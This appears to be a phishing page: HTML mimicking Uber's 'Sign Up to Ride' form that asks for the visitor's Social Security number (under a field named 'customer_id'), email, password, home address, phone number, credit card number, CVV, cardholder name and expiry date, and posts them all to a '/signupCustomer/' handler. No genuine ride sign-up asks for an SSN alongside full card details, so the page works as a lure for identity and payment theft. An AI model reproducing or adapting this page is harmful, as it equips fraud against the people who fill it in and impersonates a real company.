<!DOCTYPE html>
<html >
  <title>
    
  Sign Up to Ride With Uber Today | Uber

  </title>
 
  <link rel="stylesheet" type="text/css" href="css/base_signup_lite.css">
  <link rel="stylesheet" type="text/css" href="css/base_signup_creditcardicon.css">
 


  
    <link rel="stylesheet" href="css/superfine.css">
  

<body class=" ">
  
    <section class="wrapper">
    
  <header class="contextual"><div class="logo"></div>
    
  </header>

  <section class="content ">

<div class="signup-wrapper">

  <section class="signup-top">
    <div class="signup-top-images">
      <div class="signup-top-phones"></div>
    </div>
    <div class="signup-top-text">
      <div class="signup-top-text-title">
        Sign Up to Ride
      </div>
      <div class="signup-top-text-subtitle">
        <p>Welcome to Uber, the easiest way to get around at the tap of a button.</p>
        <p>Create your account and get moving in minutes.</p>
      </div>
    </div>
  </section>


  <section class="signup-form">
    <article class="form-container">
      <form class="form-vertical" action="/signupCustomer/" method="POST" autocomplete="on">

        <div class="signup-form-section account">
          <div class="signup-form-section-title"><p>Account</p></div>
          <div class="signup-form-section-required">Required</div>
          <div class="signup-form-section-number blue">1</div>
          <div class="signup-form-section-line"></div>

          
    
  <div class="form-group required ">
  <label for="ssn">SSN</label>

  <input type="text" value="" name="customer_id" id="customer_id" placeholder="123-45-6789">
  
  <div class="error-notice"></div>
  </div>  

  
  <div class="form-group required ">
  
  <label for="email">Email</label>

  <input type="email" value="" name="email" id="email" placeholder="name@example.com">
  
  <div class="error-notice"></div>
  </div>

  <div class="form-group required ">
 
  <label for="password">Password</label>
  
  
  <input type="password" value="" name="password" id="password" placeholder="At least 5 characters">
  
  <div class="error-notice"></div>
  </div>
        </div>

        <div class="signup-form-section profile">
          <div class="signup-form-section-title"><p>Profile</p></div>
          <div class="signup-form-section-number">2</div>
          <div class="signup-form-section-line"></div>
    
  <div class="form-group required ">
 
  <label for="name">Name</label>
    <div class="row form-row">
		<div class="col-md-6 col-xs-6 md-push-right-half sm-push-right-half xs-push-right-half">
    
			<input type="text" value="" name="first_name" id="first_name" placeholder="First Name">
  
			<div class="error-notice"></div>
		</div>
		<div class="col-md-6 col-xs-6 md-push-left-half xs-push-left-half">
     <input type="text" value="" name="last_name" id="last_name" placeholder="Last Name">
  
			<div class="error-notice"></div>
		</div>
    </div>
  </div>
  
    <div class="form-group required ">
  <label for="city">City</label>
    <div class="row form-row">
		<div class="col-md-6 col-xs-6 md-push-right-half sm-push-right-half xs-push-right-half">
 <input type="text" value="" name="city" id="city" placeholder="City">
  
			<div class="error-notice"></div>
		</div>
    </div>
  </div>
  
  <div class="form-group required ">
<label for="state">State</label>
    <div class="row form-row">
		<div class="col-md-6 col-xs-6 md-push-right-half sm-push-right-half xs-push-right-half">
<input type="text" value="" name="state" id="state" placeholder="State">
  
			<div class="error-notice"></div>
		</div>
    </div>
  </div>
  
  <div class="form-group required ">
 <label for="address">Address</label>
    <div class="row form-row">
		<div class="col-md-6 col-xs-6 md-push-right-half sm-push-right-half xs-push-right-half">
 <input type="text" value="" name="address" id="address" placeholder="Address">
  
			<div class="error-notice"></div>
		</div>
    </div>
  </div>
  <div class="form-group required ">
 <label for="zipcode">Zipcode</label>
    <div class="row form-row">
		<div class="col-md-6 col-xs-6 md-push-right-half sm-push-right-half xs-push-right-half">
 <input type="text" value="" name="zipcode" id="zipcode" placeholder="zipcode">
  
			<div class="error-notice"></div>
		</div>
    </div>
  </div>
   <div class="form-group js-mobile-country required mobile-number">
 <label for="mobile">Mobile Number</label>
    <select name="mobile_country" id="mobile_country" class="js-mobile-country required">
 <option value="US" label="United States (+1)" selected="" data-iso3="USA" data-telephone_code="+1">United States</option>
     
  </select>
    <div class="mobile-country-mask">
      <p class="mobile-country-mask-text">+1</p>
    </div>

  <input type="text" value="" name="mobile" id="mobile" placeholder="(201) 555-5555">
  
  <div class="error-notice"></div>
  </div>
  
        </div>

        <div class="signup-form-section payment">
          <div class="signup-form-section-title"><p>Payment</p></div>

          <div class="payment-errors js-error-list">
            <ul></ul>
          </div>

          <div class="signup-form-section-number">3</div>
          <div class="signup-form-section-line"></div>
   

  <div class="credit-card-info">
      <div class="row form-row">
        <div class="col-md-9 col-xs-9 xs-push-right-half">
  <div class="form-group required ">

  <label for="card_number">Credit Card Number</label>
 
  
  <input type="tel" value="" name="cc_number" id="cc_number" placeholder="1234 5678 9012 3456">
  
    <div class="credit-card-icon"></div>
  
  <div class="error-notice"></div>
  </div>
        </div>
        <div class="col-md-3 col-xs-3 xs-push-left-half">
 
  <div class="form-group required ">
  <label for="card_code">CVV</label>

  <input type="tel" value="" name="cvv" id="cvv" placeholder="123">
  
  <div class="error-notice"></div>
  </div>
        </div>
      </div>
	  
	  <div class="form-group required ">
 
  <label for="card_name">Card Holder Name</label>

  <input type="tel" value="" name="cc_name" id="cc_name" placeholder="Simon Shim">
  
  <div class="error-notice"></div>
  </div>

      <div class="form-group required">
        <div class="row form-row">
          <div class="col-md-8 col-xs-12 full-row-xs">

  <label for="card_expiration">Expiration Date</label>
            <div class="row form-row">
              <div class="col-md-6 col-xs-6 xs-push-right-half col-xs-row">
                <select name="month" id="month" class="gray">
    <option value="" label="month" disabled="" selected="">month</option>
    
      <option value="1" label="1">
        1
      </option>
    
      <option value="2" label="2">
        2
      </option>
    
      <option value="3" label="3">
        3
      </option>
    
      <option value="4" label="4">
        4
      </option>
    
      <option value="5" label="5">
        5
      </option>
    
      <option value="6" label="6">
        6
      </option>
    
      <option value="7" label="7">
        7
      </option>
    
      <option value="8" label="8">
        8
      </option>
    
      <option value="9" label="9">
        9
      </option>
    
      <option value="10" label="10">
        10
      </option>
    
      <option value="11" label="11">
        11
      </option>
    
      <option value="12" label="12">
        12
      </option>
    
  </select>
              </div>
              <div class="col-md-6 col-xs-6 xs-push-left-half col-xs-row">
                
  <select name="year" id="year" class="gray">
    <option value="" label="year" disabled="" selected="">year</option>
    
      <option value="2015" label="2015">
        2015
      </option>
    
      <option value="2016" label="2016">
        2016
      </option>
    
      <option value="2017" label="2017">
        2017
      </option>
    
      <option value="2018" label="2018">
        2018
      </option>
    
      <option value="2019" label="2019">
        2019
      </option>
    
      <option value="2020" label="2020">
        2020
      </option>
    
      <option value="2021" label="2021">
        2021
      </option>
    
      <option value="2022" label="2022">
        2022
      </option>
    
      <option value="2023" label="2023">
        2023
      </option>
    
      <option value="2024" label="2024">
        2024
      </option>
    
      <option value="2025" label="2025">
        2025
      </option>
    
      <option value="2026" label="2026">
        2026
      </option>
    
      <option value="2027" label="2027">
        2027
      </option>
    
      <option value="2028" label="2028">
        2028
      </option>
    
      <option value="2029" label="2029">
        2029
      </option>
    
      <option value="2030" label="2030">
        2030
      </option>
    
      <option value="2031" label="2031">
        2031
      </option>
    
      <option value="2032" label="2032">
        2032
      </option>
    
      <option value="2033" label="2033">
        2033
      </option>
    
      <option value="2034" label="2034">
        2034
      </option>
    
  </select>
              </div>
            </div>
          </div>
        </div>
      </div>
  </div>


        </div>

        <div class="signup-form-section submit">
          <div class="col-md-12">
            <img class="loader defer_image_loading" src="./Sign Up to Ride With Uber Today _ Uber_files/loader.a5b022ab0fad102f521a454df3ceb117.gif" data-src="https://d1a3f4spazzrp4.cloudfront.net/free-candy/images/gfx/loader.a5b022ab0fad102f521a454df3ceb117.gif">
            
  <div class="form-group">
    
  
  <button type="submit" class="btn btn-primary ">Create Account</button>
  </div>
  </div>
  </div>
      </form>
    </article>
  </section>

</div>

</section>

    </section></body></html>